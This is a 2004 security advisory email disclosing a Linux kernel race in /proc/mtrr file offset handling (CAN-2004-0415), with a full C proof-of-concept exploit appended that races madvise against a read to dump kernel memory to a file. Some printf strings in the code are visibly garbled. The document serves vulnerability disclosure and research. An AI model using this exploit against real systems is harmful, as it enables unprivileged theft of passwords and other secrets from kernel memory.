Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
From: Paul Starzetz <[email protected]>
To: [email protected], [email protected],
Subject: Linux kernel file offset pointer races
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Linux kernel file offset pointer handling
Product: Linux kernel
Version: 2.4 up to to and including 2.4.26, 2.6 up to to and
including 2.6.7
Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE: CAN-2004-0415
Author: Paul Starzetz <[email protected]>
Date: Aug 04, 2004
Issue:
======
A critical security vulnerability has been found in the Linux kernel
code handling 64bit file offset pointers.
Details:
========
The Linux kernel offers a file handling API to the userland
applications. Basically a file can be identified by a file name and
opened through the open(2) system call which in turn returns a file
descriptor for the kernel file object.
One of the properties of the file object is something called 'file
offset' (f_pos member variable of the file object), which is advanced if
one reads or writtes to the file. It can also by changed through the
lseek(2) system call and identifies the current writing/reading position
inside the file image on the media.
There are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have
identified numerous places, where invalid conversions from 64 bit sized
file offsets to 32 bit ones as well as insecure access to the file
offset member variable take place.
We have found that most of the /proc entries (like /proc/version) leak
about one page of unitialized kernel memory and can be exploited to
obtain sensitive data.
We have found dozens of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:
static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
return len;
} /* End Function mtrr_read */
It is quite easy to see that since copy_to_user can sleep, the second
reference to *ppos may use another value. Or in other words, code
operating on the file->f_pos variable through a pointer must be atomic
in respect to the current thread. We expect even more troubles in the
SMP case though.
Exploitation:
=============
In the following we want to concentrate onto the mttr.c code, however we
think that also other f_pos handling code in the kernel may be
exploitable.
The idea is to use the blocking property of copy_to_user to advance the
file->f_pos file offset to be negative allowing us to bypass the two
checks marked with [1] and [2] in the above code.
There are two situation where copy_to_user() will sleep if there is no
page table entry for the corresponding location in the user buffer used
to receive the data:
- - the underlying buffer maps a file which is not in the kernel page
cache yet. The file content must be read from the disk first
- - the mmap_sem semaphore of the process's VM is in a closed state, that
is another thread sharing the same VM caused a down_write on the
semaphore.
We use the second method as follows. One of two threads sharing same VM
issues a madvise(2) call on a VMA that maps some, sufficiently big file
setting the madvise flag to WILLNEED. This will issue a down_write on
the mmap semaphore and schedule a read-ahead request for the mmaped
file.
Second thread issues in the mean time a read on the /proc/mtrr file thus
going for sleep until the first thread returns from the madvise system
call. The two threads will be woken up in a FIFO manner thus the first
thread will run as first and can advance the file pointer of the proc
file to the maximum possible value of 0x7fffffffffffffff while the
second thread is still waiting in the scheduler queue for CPU (itn the
non-SMP case).
After the place marked with [3] has been executed, the file position
will have a negative value and the checks [1] and [2] can be passed for
any buffer length supplied, thus leaking the kernel memory from the
address of ascii_buffer on to the user space.
We have attached a proof-of-concept exploit code to read portions of
kernel memory. Another exploit code we have at our disposal can use
other /proc entries (like /proc/version) to read one page of kernel
memory.
Impact:
=======
Since no special privileges are required to open the /proc/mtrr file for
reading any process may exploit the bug to read huge parts of kernel
memory.
The kernel memory dump may include very sensitive information like
hashed passwords from /etc/shadow or even the root passwort.
We have found in an experiment that after the root user logged in using
ssh (in our case it was OpenSSH using PAM), the root passwort was keept
in kernel memory. This is very suprising since sshd will quickly clean
(overwrite with zeros) the memory portion used to store the password.
But the password may have made its way through various kernel paths like
pipes or sockets.
Tested and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all vulnerable systems as
soon as appropriate vendor patches are released. There is no hotfix for
this vulnerability.
Credits:
========
Paul Starzetz <[email protected]> has identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.
Disclaimer:
===========
This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.
Appendix:
=========
/*
*
* /proc ppos kernel memory read (semaphore method)
*
* gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <asm/page.h>
// define machine mem size in MB
#define MEMSIZE 64
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
uint, wh);
void fatal(const char *msg)
{
printf("0);
if(!errno) {
fprintf(stderr, "FATAL ERROR: %s0, msg);
}
else {
perror(msg);
}
printf("0);
fflush(stdout);
fflush(stderr);
exit(31337);
}
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;
// child close sempahore & sleep
int start_child(void *arg)
{
// unlock parent & close semaphore
go[0]=0;
madvise(file, csize, MADV_DONTNEED);
madvise(file, csize, MADV_SEQUENTIAL);
gettimeofday(&tv1, NULL);
read(pfd, buf, 0);
go[0]=1;
r = madvise(file, csize, MADV_WILLNEED);
if(r)
fatal("madvise");
// parent blocked on mmap_sem? GOOD!
if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
if( r == -1 )
fatal("lseek");
printf("0 Race won!"); fflush(stdout);
go[0]=2;
} else {
printf("0 Race lost %d, use another file!0, go[1]);
fflush(stdout);
kill(getppid(), SIGTERM);
}
_exit(1);
return 0;
}
void usage(char *name)
{
printf("0SAGE: %s <file not in cache>", name);
printf("0);
exit(1);
}
int main(int ac, char **av)
{
if(ac<2)
usage(av[0]);
// mmap big file not in cache
r=stat(av[1], &st);
if(r)
fatal("stat file");
csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
fd=open(av[1], O_RDONLY);
if(fd<0)
fatal("open file");
file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
if(file==MAP_FAILED)
fatal("mmap");
close(fd);
printf("0 mmaped uncached file at %p - %p", file, file+csize);
fflush(stdout);
pfd=open("/proc/mtrr", O_RDONLY);
if(pfd<0)
fatal("open");
fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
if(fd<0)
fatal("open data");
r=ftruncate(fd, fsize);
if(r<0)
fatal("ftruncate");
buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if(buf==MAP_FAILED)
fatal("mmap");
close(fd);
printf("0 mmaped kernel data file at %p", buf);
fflush(stdout);
// clone thread wait for child sleep
nc = nice(0);
cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
CLONE_FILES|CLONE_VM, NULL);
nice(19-nc);
while(go[0]==0) {
i++;
}
// try to read & sleep & move fpos to be negative
gettimeofday(&tv1, NULL);
go[1] = 1;
r = read(pfd, buf, size );
go[1] = 2;
gettimeofday(&tv2, NULL);
if(r<0)
fatal("read");
while(go[0]!=2) {
i++;
}
us = tv2.tv_sec - tv1.tv_sec;
us *= 1000000;
us += (tv2.tv_usec - tv1.tv_usec) ;
printf("0 READ %d bytes in %d usec", r, us); fflush(stdout);
r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
if(r < 0 ) {
printf("0 SUCCESS, lseek fails, reading kernel mem...0);
fflush(stdout);
i=0;
for(;;) {
r = read(pfd, buf, PAGE_SIZE );
if(r!=PAGE_SIZE)
break;
buf += PAGE_SIZE;
i++; PAGE %6d", i); fflush(stdout);
printf("
}
printf("0 done, err=%s", strerror(errno) );
fflush(stdout);
}
close(pfd);
printf("0);
sleep(1);
kill(cpid, 9);
return 0;
}
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFBELj2C+8U3Z5wpu4RAgZZAKC8SxT6m4XMoU1koNfFLbf1Vfj32wCgubCT
k2SjwaZ3U2CsOQmcvjRr1IA=
=hIiM
-----END PGP SIGNATURE-----